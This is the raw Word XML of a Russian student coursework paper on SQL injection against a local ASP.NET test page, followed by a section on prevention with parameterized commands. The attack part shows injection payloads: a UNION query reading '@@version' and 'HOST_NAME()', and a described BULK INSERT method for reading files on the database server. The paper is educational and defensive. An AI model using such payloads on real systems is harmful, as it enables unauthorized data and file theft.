          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее, основываясь на таблице </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>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rPr>
        <w:t xml:space="preserve"> мы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00417CBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>може</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00417CBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вывести все данные из этой таблицы. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для</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примера</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можно</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воспользоваться</w:t>
      </w:r>
      <w:r w:rsidRPr="00417CBE">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следухим</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00417CBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запросом</w:t>
      </w:r>
      <w:r w:rsidRPr="00417CBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417CBE" w:rsidRPr="00417CBE" w:rsidRDefault="00417CBE" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00417CBE" w:rsidRP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417CBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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417CBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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Pr="00417CBE" w:rsidRDefault="00417CBE" w:rsidP="00417CBE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2819566" cy="2931619"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Рисунок 1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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2819491" cy="293154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2676442" cy="2753242"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Рисунок 1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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2676587" cy="2753391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417CBE" w:rsidRPr="00417CBE" w:rsidRDefault="00417CBE" w:rsidP="00417CBE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00651CE6" w:rsidRPr="008F0DAD" w:rsidRDefault="00920FAE" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Узнать имя текущего хоста и версию базы данных можно следующим запросом:</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920FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1, @@version, HOST_NAME(), 1 --</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920FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1, @@version, HOST_NAME(), 1 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00920FAE" w:rsidRPr="00920FAE" w:rsidRDefault="00920FA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39786" cy="2456953"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Рисунок 13"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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2841595" cy="2458518"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00920FA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22933" cy="2516539"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Рисунок 14"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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2928119" cy="2521004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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E25A3F" w:rsidRDefault="00E25A3F" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25A3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Предположим мы хотим считать файл на машине, которая держит сервер базы данных. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это легко можно сделать</w:t>
      </w:r>
      <w:r w:rsidR="0097556D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> зная имя файла и расположение. Для этого необходимо воспользоваться оператором </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bulk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insert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E25A3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сначала мы создаём табличку на сервере, которая будет служить хранилищем данных для информации из файла. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Затем вставляем данные из файла в эту таблицу и выводим их. Затем лучше удалить эту таблицу, так как она может повлиять на работу сервера. Пример</w:t>
      </w:r>
      <w:r w:rsidR="00AD6EEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> последовательных</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25A3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD6EEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запросов</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25A3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6EEA" w:rsidRDefault="00AD6EEA"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Pr="00E25A3F" w:rsidRDefault="00E25A3F" w:rsidP="00E25A3F">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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Union  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E25A3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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E25A3F" w:rsidRPr="00D11F44"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">%') </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Union  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E25A3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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D11F44" w:rsidRPr="009F0170" w:rsidRDefault="00D11F44" w:rsidP="00D11F44">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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sidRPr="002407D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1'; 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407D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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AD6EEA" w:rsidRPr="00E25A3F" w:rsidRDefault="00AD6EEA" w:rsidP="00AD6EEA">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862470" cy="2146758"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="3"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22" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2864208" cy="2148062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E25A3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67813" cy="2170706"/>
            <wp:effectExtent l="19050" t="0" r="3987" b="0"/>
            <wp:docPr id="6" name="Рисунок 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 - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2969304" cy="2171797"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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A852C0" w:rsidRDefault="00A852C0" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc420429534"/>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p w:rsidR="004936B0" w:rsidRDefault="004936B0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRPr="004936B0" w:rsidRDefault="00A852C0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc420854438"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Способы предотвращения</w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql-инъекций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00800878" w:rsidRDefault="008F0DAD" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc420429536"/>
      <w:bookmarkStart w:id="13" w:name="_Toc420854439"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1) Использование параметризованных команд</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00C3573A" w:rsidRDefault="008F0DAD" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>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Параметризованная команда — это просто команда, которая использует символы-заполнители в тексте SQL. Заполнитель указывает место для динамически применяемых значений, которые затем пересылаются через коллекцию </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameters </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объекту</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command. </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Например</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>следующий</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оператор</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00C3573A" w:rsidRDefault="00FC4D17" w:rsidP="008F0DAD">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r w:rsidR="008F0DAD" w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Customers</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomerID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
